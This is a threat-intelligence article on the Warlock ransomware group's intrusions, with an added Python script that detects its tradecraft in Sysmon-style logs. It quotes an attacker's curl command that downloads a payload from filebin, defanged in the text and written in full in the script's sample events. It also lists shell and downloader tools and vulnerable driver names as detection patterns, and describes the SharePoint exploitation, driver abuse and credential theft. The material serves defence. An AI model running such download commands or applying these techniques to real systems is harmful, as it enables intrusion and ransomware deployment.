
Another advanced ransomware operation has emerged: GOLD SALEM, a recently identified group also referred to as the Warlock Group, has been infiltrating corporate networks since March 2025.

The group has struck 60 organizations across North America, Europe, and South America, deploying its own Warlock ransomware payload with evident proficiency.

Microsoft tracks the group as Storm-2603 and assesses with moderate confidence that it operates from China, although attribution remains uncertain.

GOLD SALEM has carved out a position in the crowded ransomware landscape by targeting a wide range of victims, from small businesses to large multinational enterprises.

The group runs a double-extortion model, using a Tor-based data leak site to publish stolen data when ransom demands are not met.

Victim selection appears deliberate: the group has mostly avoided targets in China and Russia, yet it listed a Russian power generation services company in September 2025, which suggests it may not operate from the usual ransomware safe havens.

The group first surfaced publicly in June 2025, posting on the RAMP underground forum to seek exploits for enterprise applications such as Veeam, ESXi, and SharePoint and to request tools for disabling endpoint detection and response (EDR) agents.

Sophos analysts noted the group's strong operational security and its efforts to recruit initial access brokers, which suggests it may conduct intrusions directly or operate a ransomware-as-a-service model.

The operational structure of GOLD SALEM displays meticulous planning and technical sophistication.

The group maintains a countdown clock for each victim, typically allowing 12 to 14 days for ransom payment before the data is published.

As of September 2025, it claims to have sold data from 45% of its victims to private buyers, although these figures may be inflated for psychological effect.

GOLD SALEM leak site as of September 16, 2025 (Source – Sophos)

The leak site has a professional design and categorizes its victims, reflecting the group's attention to operational polish.

Advanced Evasion Techniques and Security Bypass Methods

Technical analysis shows a sophisticated approach to evading security controls and maintaining network access.

For initial access the group uses the ToolShell exploit chain against on-premises SharePoint servers, combining the critical vulnerabilities CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, and CVE-2025-53771.

After exploitation they deploy an ASPX web shell that spawns cmd.exe through a .NET Process object in the context of the IIS worker process (w3wp.exe), giving remote command execution with the command output returned to the attacker.

One command observed being issued through the web shell (defanged, with the original path separators restored):

curl -L -o c:\users\public\Sophos\Sophos-UI[.]exe hxxps[:]//filebin[.]net/j7jqfnh8tn4alzsr/wsocks[.]exe[.]txt

This downloads a Go-based WebSockets server, written to a path that mimics a Sophos component, giving the actors persistent access that no longer depends on the web shell.

The group also evades defenses with a Bring Your Own Vulnerable Driver (BYOVD) technique: it loads a renamed vulnerable Baidu Antivirus driver (as googleApiUtil64.sys) and exploits CVE-2024-51324 to terminate arbitrary processes, with EDR agents as the intended targets.
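The web shell command execution, the curl download to a writable public directory, and the renamed-driver load described above each leave a distinct trace in endpoint telemetry. As an added example (not code from Sophos or from the original article), the following Python runs three detection rules over constructed Sysmon-style records: process creation (event ID 1) and driver load (event ID 6). The sample records, the key=value log format and the exact Baidu signer string are assumptions for illustration; the underlying premise, that a renamed driver keeps its original Authenticode signature so the signer name remains visible even when the file name changes, is what the third rule relies on.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style records (key=value, quoted where a value has spaces).
# These are illustrative, not telemetry from a real intrusion.
SAMPLE_EVENTS = [
    'EventID=1 Image=C:\\Windows\\System32\\cmd.exe '
    'ParentImage=C:\\Windows\\System32\\inetsrv\\w3wp.exe '
    'CommandLine="cmd.exe /c whoami"',
    'EventID=1 Image=C:\\Windows\\System32\\curl.exe '
    'ParentImage=C:\\Windows\\System32\\cmd.exe '
    'CommandLine="curl -L -o c:\\users\\public\\Sophos\\Sophos-UI.exe '
    'https://filebin.net/j7jqfnh8tn4alzsr/wsocks.exe.txt"',
    'EventID=6 ImageLoaded=C:\\Windows\\Temp\\googleApiUtil64.sys '
    'Signature="Beijing Baidu Netcom Science Technology Co.,Ltd." SignatureStatus=Valid',
    'EventID=1 Image=C:\\Windows\\System32\\svchost.exe '
    'ParentImage=C:\\Windows\\System32\\services.exe '
    'CommandLine="svchost.exe -k netsvcs"',
]

# key=value pairs; a quoted value may contain spaces, an unquoted one may not.
_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Binaries an IIS worker process has no business spawning, and the
# living-off-the-land downloaders the group's curl command exemplifies.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "curl.exe", "certutil.exe", "bitsadmin.exe"}
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe"}
# Renamed copy named in the report plus the driver's original file name
# (assumption: the original name is the one tied to CVE-2024-51324).
KNOWN_BAD_DRIVERS = {"googleapiutil64.sys", "bdapiutil64.sys"}


def parse_event(line: str) -> dict:
    """Parse one key=value record into a dict."""
    return {k: (quoted or bare) for k, quoted, bare in _KV.findall(line)}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return PureWindowsPath(path).name.lower()


def check_event(ev: dict) -> list:
    """Return the names of every rule the record matches."""
    hits = []
    eid = ev.get("EventID")
    if eid == "1":
        image = basename(ev.get("Image", ""))
        parent = basename(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "").lower()
        # Rule 1: web shell activity, w3wp.exe spawning a shell or downloader.
        if parent == "w3wp.exe" and image in SHELLS:
            hits.append("iis_worker_spawns_shell")
        # Rule 2: payload staged into the world-writable c:\users\public tree.
        if image in DOWNLOADERS and "\\users\\public\\" in cmd:
            hits.append("download_to_users_public")
    elif eid == "6":
        drv = basename(ev.get("ImageLoaded", ""))
        sig = ev.get("Signature", "").lower()
        # Rule 3: known vulnerable driver by name, or the Baidu signer showing
        # through a renamed file (the signature survives the rename).
        if drv in KNOWN_BAD_DRIVERS or "baidu" in sig:
            hits.append("byovd_baidu_driver_load")
    return hits


def scan(lines) -> list:
    """Yield (image, [rule names]) for every record that matches a rule."""
    results = []
    for line in lines:
        ev = parse_event(line)
        hits = check_event(ev)
        if hits:
            results.append((ev.get("Image") or ev.get("ImageLoaded"), hits))
    return results


if __name__ == "__main__":
    for image, hits in scan(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(hits)}")
```

Rule 1 fires on the parent/child pair rather than on a specific command, so it also catches the many other commands an operator issues through a web shell; rule 3 is deliberately two-pronged because a defender who only lists file names is beaten by the very rename this group performed.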

Their toolkit also includes Mimikatz for extracting credentials from LSASS memory, PsExec and Impacket for lateral movement, and modification of Group Policy Objects to push the ransomware to endpoints across the network.
